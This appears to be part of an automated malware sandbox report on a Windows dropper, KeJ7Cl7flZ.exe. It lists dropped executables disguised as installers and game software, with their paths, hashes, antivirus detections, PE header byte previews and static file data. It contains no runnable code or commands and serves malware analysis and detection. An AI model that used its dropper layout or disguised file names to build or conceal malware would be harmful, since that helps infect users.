                                                                                                              Category:dropped
                                                                                                              Size (bytes):308224
                                                                                                              Entropy (8bit):4.340693708730459
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:L3Vi8CzqGLI9F5NXgDJUnPms7U158fRWG0zn2tMbfcPRGCMjjjjjjjjo:OOGLI9lXUJ+Pms7d8G42tMbfcPRGCM
                                                                                                              MD5:7285B1F8E710E7D686F70306A76AD055
                                                                                                              SHA1:2D038C234C65B19B118C9820A917BA70E3623C18
                                                                                                              SHA-256:3DD96A30CF8E7A4E3E4E5FD64F4F71B78CE51F05C0B2DBB776D2CE4179ED7EA9
                                                                                                              SHA-512:A2B4C4F8AF7541409ECA18FCEEF718CEFAA6B8FA08222CA68BE30931AD7582F35D576CEF8C66EC3293EBE014FC8F1443F45A723437D84F70AAD3AA082D7A22BF
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L....el].....................^+......\............@...........................,.....&<......................................<...<.... +.......................,......................................................................................text............................... ..`.data.....)......4..................@....vuwuzed......+......0..............@....sudoze.......+......2..............@....rsrc........ +......4..............@..@.reloc..p.....,.....................@..B................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4240136
                                                                                                              Entropy (8bit):7.970247718055294
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:98304:YjIeXG3LvUm3JyHGLjR+OCyn8LmqsQf4xi3OimS1gHNQd4yN:YjAAF2jR+68LmJ24xITCtQj
                                                                                                              MD5:62EAEA103DD9BEB69E884F2EDE1ACD63
                                                                                                              SHA1:324DB9E359DA3489217C5CB2F46B59AD383C8523
                                                                                                              SHA-256:E1A1205CC671D2008D09ED556DB705D3F3976B8098C4E2304C6E6C84041C22B8
                                                                                                              SHA-512:B501AF99056DA3D34EE27F63548C89F9C9157182C55838FAE26F510C88E2FA2105E083766F270F41B661E6306EB78D3B2D26BE3B7C2A9E0EF55B7FDF212BD94D
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@.......................... ............@.................................@........@.......................`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...P...............................rsrc........@......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exe
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):536576
                                                                                                              Entropy (8bit):6.856117131435329
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:RXvt5Xy3dte25VTD21EOj5Ia4c9co+3aag9dCj6pr1FWZGKSu9mJeoBL:R12T61E4IfXi95ndu9e
                                                                                                              MD5:3B7666DDCD8668A6E0F228BC15C2D528
                                                                                                              SHA1:1EC26D6AFC64C30291A12638F9FA1CACBC530834
                                                                                                              SHA-256:FF7C1BE25F9D0B351C2F1F11B9700D6C467519F6E374DF66A78DB855EAC39DD9
                                                                                                              SHA-512:21730DF8C6450F304926C0F81B2C1352563127FA353C4A05B32EA03C3950D65DAAA83B684C27F31334BF7C00B99CA49CAE508FCC2EF93AD1BF70B57310898995
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._..V.h...h...h..~....h..~....h..~....h..I....h..I...Yh..I...9h..~....h...h...h.......h....4..h...h\..h.......h..Rich.h..........PE..L...`.._.................>........................@.......................................@.....................................x....`..`....................`...<......p...............................@...............8............................text...t........................... ....vnnsfgf.=.......>.................. ..`.vnnsfgfz.... ...................... ..`.vnnsfgf.....0...................... ..`.vnnsfgf.....@.......*.............. ..`.vnnsfgf>....P.......,.............. ..`.vnnsfgf.....p.......>.............. ..`.rdata...............B..............@..@.data...P)...0......................@....rsrc...`....`......................@..@.reloc...<...`...>..................@..B........................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\config.ini
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3
                                                                                                              Entropy (8bit):0.9182958340544896
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:f:f
                                                                                                              MD5:93DD4DE5CDDBA2C733C65F233097F05A
                                                                                                              SHA1:6FC978AF728D43C59FAA400D5F6E0471AC850D4C
                                                                                                              SHA-256:A1DD6837F284625BDB1CB68F1DBC85C5DC4D8B05BAE24C94ED5F55C477326EA2
                                                                                                              SHA-512:FA3AD36CF41C6AF0E9EC7CCFDB69276D67F5C5F99D09064DC565FCDE761E7D9F7FD2AE45DFD8487C89AFF5BBCC11B58EBF44D5C22F114249B3CA4A6E088B42B2
                                                                                                              Malicious:false
                                                                                                              Preview: 002
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\d
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26824704
                                                                                                              Entropy (8bit):0.9757760335200523
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:5ELvckxfFUgj2h9yr9YN/3kOunAPQoqooiO3PX2BU:eUgj2h9uYNPkOuQ
                                                                                                              MD5:E13008D82626E15656E9AB26F4901C17
                                                                                                              SHA1:A25AE485F4A14A6A04C9CCE1737FF9BF9E93DADE
                                                                                                              SHA-256:1446D4AA481B61982A52DFE5326B52B2CD8A4D8A7A33BC258D79FC024C908379
                                                                                                              SHA-512:B68A2FE17DDCC8F03B83D7F87785CABD10A8710E6E1A48183612D9228BDBECA79471556BB620BA89E06EEAB1B435DF899186DE36F4DF1131CFC596755E850D98
                                                                                                              Malicious:false
                                                                                                              Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\d.INTEG.RAW
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1605
                                                                                                              Entropy (8bit):5.206056345547401
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:KuiC4ts26Fp23tnungHQCbcMU/NVlyax4dKJ1qUtLnFtAO71OZ1OOynuQL1h9uqn:K24CX7utbFU/fljPtt7cPy51huh3s
                                                                                                              MD5:D2A0EA84FB0A10722D869674BF875F53
                                                                                                              SHA1:CC2B9DDECF88BE8062DAC7B93EF742E251D9F5E6
                                                                                                              SHA-256:7AC1ACC412CFE6C754B0431A8A62F0EDA213DA1EB32584ED0D8FD2776A49AD8F
                                                                                                              SHA-512:B6BA7BF26E388E4DE069333E2094BB409F96D273CF049ECC421796589095DCAAB26703695CB26E3E9200C563DD99AE5D156D99B4DFE243AA6EE3F96942F9AEE0
                                                                                                              Malicious:false
                                                                                                              Preview: ***** Repair of database 'd' started [ESENT version 06.02.9200.0000, (ESENT[6.2.9200.0] RETAIL RTM MBCS)]....search for 'ERROR:' to find errors..search for 'WARNING:' to find warnings..checking database header..ERROR: database was not shutdown cleanly (Dirty Shutdown)..database file "d" is 26738688 bytes..database file "d" is 26738688 bytes on disk...Creating 16 threads..checking SystemRoot..SystemRoot (OE)..ERROR: page 2: dbtime is larger than database dbtime (0x3844, 0x3172)..SystemRoot (AE)..ERROR: page 3: dbtime is larger than database dbtime (0x3846, 0x3172)..checking system tables..MSysObjects ..MSysObjectsShadow ..MSysObjects:.5056:.ERROR: page 13: dbtime is larger than database dbtime (0x37e0, 0x3172)..MSysObjects:.5056:.ERROR: page 19: dbtime is larger than database dbtime (0x37f8, 0x3172)..MSysObjects:.5056:.ERROR: page 20: dbtime is larger than database dbtime (0x3899, 0x3172)..MSysObjects Name..MSysObjects RootObjects..MSysObjectsShadow:.5056:.ERROR: page 27: dbtime is larg
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\d.jfm
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8192
                                                                                                              Entropy (8bit):0.07621424775336932
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:iTmARoM/ClAJOwYGll/zG6B/ill:iT2AJOHG//BE
                                                                                                              MD5:20F07AEBA37DAA75B58799DCEB795F56
                                                                                                              SHA1:041A1C528F83EF16889B529CB94BE1A19EB99254
                                                                                                              SHA-256:B1B88CC6BB90D79D746CA4CFCCAD43F07F775340575115CAD1BC49B48D633BDE
                                                                                                              SHA-512:CAEE3277934685EA0EF993876C082221548F667843E7D73030446F2102B085066678482A1578FF5B634695297D202FFA907FFE28521A915E945CE3E0BB51D7DE
                                                                                                              Malicious:false
                                                                                                              Preview: ?...........................................x+......x+..........................................x....................#......x+.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exe
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):197104
                                                                                                              Entropy (8bit):5.334591854768522
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:kWsKHzuQmpEARYFlUJMym6tiWIZqU18x5w48qTdnuC61:khKTuDMFatTddE
                                                                                                              MD5:F542EE32E7168671E2952B89BE66BCA3
                                                                                                              SHA1:C3E785978EA1747182D3C153CBB39089E522A4A1
                                                                                                              SHA-256:8EE3A19D5E1A6C198E6AD759C697910D681365A638ACE0BC9E9C622AFE16BC73
                                                                                                              SHA-512:2C8C5FD5B0267F750809D2BAB24EBE070D11649CF2C827661C78C6627C8D7FC3B1375FDA43079DD7DAB21A02F5D75B9423F044203F58AEACE78C4F89D23C64AB
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W...W...W...8.9.^...8...^...8.8.`...^...P...W.......8.=.U...8...V...8...V...RichW...........................PE..L....l._.................R........... .......p....@.......................... ......<.....@....................................P....P...................#..............................................@............p...............................text....P.......R.................. ..`.rdata..^!...p..."...V..............@..@.data... ............x..............@....rsrc........P......................@..@.reloc..B...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exe
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1001984
                                                                                                              Entropy (8bit):7.363053750938072
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:GSmPzwRTwg3dqOdzz8E8yg2Nr+r+qdTNkdBAnlXG6+Z1mbXHIH:uLg3dqOh8EPg2p+r1kUlXF+Z1IYH
                                                                                                              MD5:5AF45B49951E4E3B1C6D1A0B9CBED2DB
                                                                                                              SHA1:CAE3F32B485F8406D8C4FB9AEECEB923B94B9452
                                                                                                              SHA-256:86407608F44BB780D40B92E45B200EDB584395CA6536E172149C75FA8C60FC5E
                                                                                                              SHA-512:F4DFCD7A5DA8458FC5727DF712FEE1E14BE0B9C9FC0B14DD31C8BC10AB85E469D975C2D4982D031901ABB1BABA10DB3976B58E4D66BE1094DC79FFF04D4AC74B
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ee.$...$...$...L...$...L...$...L...$..(C...$..(C...$..(C...$...L...$...$...$...I...$...I.$...$...$...I...$..Rich.$..........................PE..L....._.................2...&...............P....@.......................................@.....................................d.... .......................@...N..`P..p...................tQ.......P..@............P...............................text...P1.......2.................. ..`.rdata......P.......6..............@..@.data....6.......&..................@....rsrc........ ......................@..@.reloc...N...@...P..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:MS-DOS executable, MZ for MS-DOS
                                                                                                              Category:dropped
                                                                                                              Size (bytes):574976
                                                                                                              Entropy (8bit):7.836549545044653
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:8dyQUaL0a2eSteSPFRLbsY/hhgKXmEuIzRP/IYLkbQVBMvtAdhKuD:syQTLcTUGAhILzpIkkCMvShX
                                                                                                              MD5:676757904C8383FD9ACBEED15AA8DCC4
                                                                                                              SHA1:63F219EC9EF458A258B1845F42D46D2B12F30E8A
                                                                                                              SHA-256:B44ACC4498924F5FA6A479E263626E3A36FEE380C6D7463269BC5054DC64C4A9
                                                                                                              SHA-512:A4D4C945D334153FB91F2736A1EF20F6C4B5C710EC7E2064CDEF503D926BB5DA16F6ED32C56D2FC94EBB0F75BE5E25E0C4CF13E8F9A8F2FD2F110B547AEC0845
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....b._.................r.......................@..........................`...................p......................................\...................................................P...........................@............................MPRESS1.................................MPRESS2p................................rsrc...\...........................@..............................................................................v2.19...... ..5...5.|..y...#Vr..n!r..D&..7....z!ST.z..8...s.K..q9.......{M..1.l....b..C.v....Q.3..b.......E.7._../.....8.uq...;.....Y..wcIE.....g....I...s.S....4 .I........<j7X..R....y....h..k..m{.2-[.SB0.ZX//..Au..xi....:e`x.9.Z...].q._Ui_y..^.{.I%U-.>....{.{S..Ic=1|...G.T....oY/......w..e..d..W%.A../l.G{.Z...."....-...s.Ll.YA[.l7...2!...z.8..m..j..2".x..@..T..... .............V.^./......p.Ex.~.&.T.o.a.yT........r=.|..8.l...3...x.Do.Rt.....a..f....y.4..
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\tmp.edb
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x67bf4a01, page size 32768, JustCreated, Windows version 0.0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):163840
                                                                                                              Entropy (8bit):0.3131370344992014
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:Jb80jDb80jztv0sRt+lsWtktlclPktktktktktktktktktktktktktktktktktk8:Z80jH80jz1X7aNfvaXXXX
                                                                                                              MD5:90FCF86F736C8FE6ECAA12619E61CB2C
                                                                                                              SHA1:7CE6019618F2EB4CB1A90062D2EE064290D242B8
                                                                                                              SHA-256:EF996B450CD717FC6C98F57E141FE46EC09D6399E6741E27F112DA679BF21380
                                                                                                              SHA-512:8404C1BE071D57381E87E278BA956278182D46CAD0A4354EAEF48F89DF43E5FE7E37ADE99839A19BDE5878C3C997DA0CDA262A2A7D95BF25644EDCDADDB9917C
                                                                                                              Malicious:false
                                                                                                              Preview: g.J.... .......@........vI......x.................................................................................................................................................................................................................................................................................................................. ...................................................................................................................................................................................................................................................0I.......x......................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exe
                                                                                                              Process:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1811968
                                                                                                              Entropy (8bit):6.726904896911865
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:O6NxkuveGb4EurlP8cQFtYiSoTZipZnXwm:WuveGMZ8cQF6n
                                                                                                              MD5:D8AD7E3F18ED1A10211643FC215C1C26
                                                                                                              SHA1:7878E78F38FE8D181121B967271B69688EB56FC0
                                                                                                              SHA-256:B5CACBDB1C527613FFAA6CBCDDAFF819CC1AFC5EFEC0F914B9CEA1F65C1E3FD7
                                                                                                              SHA-512:203751424C86427AFA1E5F59509412186133F57949FFDFA92FCCA14D1BAFAF6710127F409140B2DEDB25F89C9BB1EC1BA47F25A6B6B4D3CB4E753DE842F4DF9D
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........&i..H:..H:..H:...:..H:..:..H:...:..H:...:..H:...:..H:..I:a.H:..:..H:..:..H:..:[.H:..:..H:..:..H:..:..H:Rich..H:........................PE..L......_.................>...................P....@..........................0............@.................................`5..h....@..p....................0......................................@...@............P.......3..@....................text...e<.......>.................. ..`.rdata.......P.......B..............@..@.data........`...z...N..............@....rsrc........@......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\nsq2FFD.tmp\Sibuia.dll
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):540456
                                                                                                              Entropy (8bit):6.4900404695826275
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:GUBa9WxfxYRW3vwDaduy2NBCzrCJDVxsR7LafByUb2iqyTOHD:da9WxfiRCv2anZnXtLa32idOHD
                                                                                                              MD5:EB948284236E2D61EAE0741280265983
                                                                                                              SHA1:D5180DB7F54DE24C27489B221095871A52DC9156
                                                                                                              SHA-256:DBE5A7DAF5BCFF97F7C48F9B5476DB3072CC85FBFFD660ADAFF2E0455132D026
                                                                                                              SHA-512:6D8087022EE62ACD823CFA871B8B3E3251E44F316769DC04E2AD169E9DF6A836DBA95C3B268716F2397D6C6A3624A9E50DBE0BC847F3C4F3EF8E09BFF30F2D75
                                                                                                              Malicious:false
                                                                                                              Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......A.....}...}...}^..|...}...|...}^..|...}^..|...}^..|...}^..|$..}...}x..}...|...}...|...}...|z..}...|...}...|...}..?}...}..W}...}...|...}Rich...}........................PE..L....mU_...........!.....2...................P.......................................8....@.........................@...\................"........... ..(....0..LH..X(..p....................).......(..@............P...............................text....1.......2.................. ..`.rdata...]...P...^...6..............@..@.data....I..........................@....rsrc....".......$..................@..@.reloc..LH...0...J..................@..B................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3956884
                                                                                                              Entropy (8bit):7.9692463026726985
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:98304:MoxQvFZ6eRJK3WbxBaOiKH2v6Ks4pmf6pK6Iir6l3C36+a:4yn2xBayWv6Jgmf6ROxC4
                                                                                                              MD5:D64E3CC11AFC6331715BDFEC5F26C2A0
                                                                                                              SHA1:BA606F3C9115C584A902C909AC82F411463B551A
                                                                                                              SHA-256:4C02D9BCAE00635DF67EA4D3D64C67F258F0256C9F1553997815F8702BC34C63
                                                                                                              SHA-512:DA002E155D6BAF03648576A4574EA4635BD35ADE04EA0175F3F406895085CD1DA9A19EB0E19E0445D40C7D6E2A42D613F0D65684775022AD426DB840034448CB
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'...Rich&...................PE..L....~.^..................................... ....@..........................0............@.............................4...4...<.... ..p.......................d"......T............................D..@............ ..`....... ....................text...*........................... ..`.rdata...... ......................@..@.data... 7..........................@....didat..............................@....rsrc........ ......................@..@.reloc..d".......$..................@..B........................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\sib309A.tmp\SibCa.dll
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4096
                                                                                                              Entropy (8bit):6.867501832742936
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:PAWqGuIO1w7JElw764ulqk4uWdCXufAx8Su2yk:oWaIO1S7ulqBhv+yk
                                                                                                              MD5:04F3C7753A4FCABCE7970BFA3B5C76FF
                                                                                                              SHA1:34FC37D42F86DAC1FD1171A806471CDFEAE9817B
                                                                                                              SHA-256:A735E33A420C2AD93279253BC57137947B5D07803FF438499AAAF6FD0692F4CD
                                                                                                              SHA-512:F774FC3F3EBF029DC6F122669060351CC58AE27C5224ABE2A6C8AB1308C4B796657D2F286760EB73A2AE7563EEEF335DAA70ED5E4B2560D34CA9873017658AFE
                                                                                                              Malicious:false
                                                                                                              Preview: ..MZ.........0......8-..@.8.0..p.........!...L.!This. program. cannot .be run i.n DOS mo.de....$...PE..L....d82........!..0............. ..B................... ...........@..*..-......#......`....O...+h..........(.Q..........8W.....O......HA...text..........u.[.......`.rsrc...M;.}.t.......@.0relo...U..)......B.......5...&......S..4o.......F.......s....(.....*..(....{.%...{.9....[...4.*..(".....}...."}A...}....D.}..6..B.(...+**D...* 6..si.......*...0.....,....(.....~......oRj..*&.....N"(@M.-...on.A..0......!H.(...o...."r..p(...(.E..r@.po.@.....o..........%.B.....(.@........o...&..% ....o.x......u...,..B...o!..B!....!...~...Tu.."..[......#E..8...o"..$Q ....c..o....*..*..`......IT..G.:. `....@;.`.0...`. 5.@.r?..pB1..s#.....A.R.%.r..p.%.DrW...%..*rFq .b*..s....%.o%@.%.oB&....o'...Do(..........o)......"o.>.o+..,oE..,a..+?.,-.@.t.7.a-%o......Yo/.../.o.].....-...r..../. #"...1..-......u.>....., ...o2......#...>....L....X..a"0.$..V..h".r..."3a..r.`.rZ@..p.(4 ....+!rh..c.B..r...po..D.U.*..*.
                                                                                                              C:\Users\user\AppData\Local\Temp\sib309A.tmp\SibClr.dll
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):52520
                                                                                                              Entropy (8bit):6.011934677477037
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:9GyM4uxlvOe/c1xpfLIa97v3A5KobiPWh:9G1vt/g7fLb97Y5VmY
                                                                                                              MD5:928E680DEA22C19FEBE9FC8E05D96472
                                                                                                              SHA1:0A4A749DDFD220E2B646B878881575FF9352CF73
                                                                                                              SHA-256:8B6B56F670D59FF93A1C7E601468127FC21F02DDE567B5C21A5D53594CDAEF94
                                                                                                              SHA-512:5FBC72C3FA98DC2B5AD2ED556D2C6DC9279D4BE3EB90FFD7FA2ADA39CB976EBA7CB34033E5786D1CB6137C64C869027002BE2F2CAD408ACEFD5C22006A1FEF34
                                                                                                              Malicious:false
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d82............!..0.................. ........... ....................... ............@.....................................O.......h...............(...............8............................................ ............... ..H............text........ ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........S..4o..........................................................F......s....(....*..(....*..{....*..{....*..{....*..{....*..(......}......}......}.......}....*6..{....(...+**..{......*6..si........*...0...........(.....~........oj...*&~.......*N(....-.~.....on...*.0..........(....o......r...p(....(....r...po.......o...........%.~.......(..........o....&........o .......u....,.~......o!...on... ...!...~..u....,.~......o!...on... ..."...[..u....,.~......o!...on... ...#
                                                                                                              C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exe
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
                                                                                                              File Type:MS-DOS executable, MZ for MS-DOS
                                                                                                              Category:dropped
                                                                                                              Size (bytes):574976
                                                                                                              Entropy (8bit):7.836549545044653
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:8dyQUaL0a2eSteSPFRLbsY/hhgKXmEuIzRP/IYLkbQVBMvtAdhKuD:syQTLcTUGAhILzpIkkCMvShX
                                                                                                              MD5:676757904C8383FD9ACBEED15AA8DCC4
                                                                                                              SHA1:63F219EC9EF458A258B1845F42D46D2B12F30E8A
                                                                                                              SHA-256:B44ACC4498924F5FA6A479E263626E3A36FEE380C6D7463269BC5054DC64C4A9
                                                                                                              SHA-512:A4D4C945D334153FB91F2736A1EF20F6C4B5C710EC7E2064CDEF503D926BB5DA16F6ED32C56D2FC94EBB0F75BE5E25E0C4CF13E8F9A8F2FD2F110B547AEC0845
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....b._.................r.......................@..........................`...................p......................................\...................................................P...........................@............................MPRESS1.................................MPRESS2p................................rsrc...\...........................@..............................................................................v2.19...... ..5...5.|..y...#Vr..n!r..D&..7....z!ST.z..8...s.K..q9.......{M..1.l....b..C.v....Q.3..b.......E.7._../.....8.uq...;.....Y..wcIE.....g....I...s.S....4 .I........<j7X..R....y....h..k..m{.2-[.SB0.ZX//..Au..xi....:e`x.9.Z...].q._Ui_y..^.{.I%U-.>....{.{S..Ic=1|...G.T....oY/......w..e..d..W%.A../l.G{.Z...."....-...s.Ll.YA[.l7...2!...z.8..m..j..2".x..@..T..... .............V.^./......p.Ex.~.&.T.o.a.yT........r=.|..8.l...3...x.Do.Rt.....a..f....y.4..

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.99387668493442
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:KeJ7Cl7flZ.exe
                                                                                                              File size:7922731
                                                                                                              MD5:4e759849412063c6590936671ce4aa0e
                                                                                                              SHA1:40d132516cc4b9aa00dca2b2f068c439cf8f59c3
                                                                                                              SHA256:7a79f0c95e891b939e275fa19e641b676f2eb70471945fb3b15d6a649cafe071
                                                                                                              SHA512:636f2e0049eab66d31a07446dbd9a747931c2ee8954b9878a7133c783e530eeba7b45060ad3bcf2f7e70c96fac4b680650c6c501aabb48cdfe98457535297e91
                                                                                                              SSDEEP:196608:KBYjwbZ5mValPcW4lib2cnmzq3oi7eGhJe+Qc7z11mX6ZnGw:jM5GMxb2cmcoi7Pa8z11mXg
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........}.k...k...k..c.a..k..c.c.[k..c.b..k..I.W..k...5./.k...5./.k...5./.k.......k.......k...k..!k..@5./.k..@5./.k..E5o..k..@5./.k.

                                                                                                              File Icon

                                                                                                              Icon Hash:d49494d6c88ecec2

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x413c60
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                              DLL Characteristics:GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                              Time Stamp:0x5EF47EA5 [Thu Jun 25 10:38:29 2020 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:5
                                                                                                              OS Version Minor:1
                                                                                                              File Version Major:5
                                                                                                              File Version Minor:1
                                                                                                              Subsystem Version Major:5
                                                                                                              Subsystem Version Minor:1
                                                                                                              Import Hash:ae9f6a32bb8b03dce37903edbc855ba1

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              call 00007FF0987CDBDDh
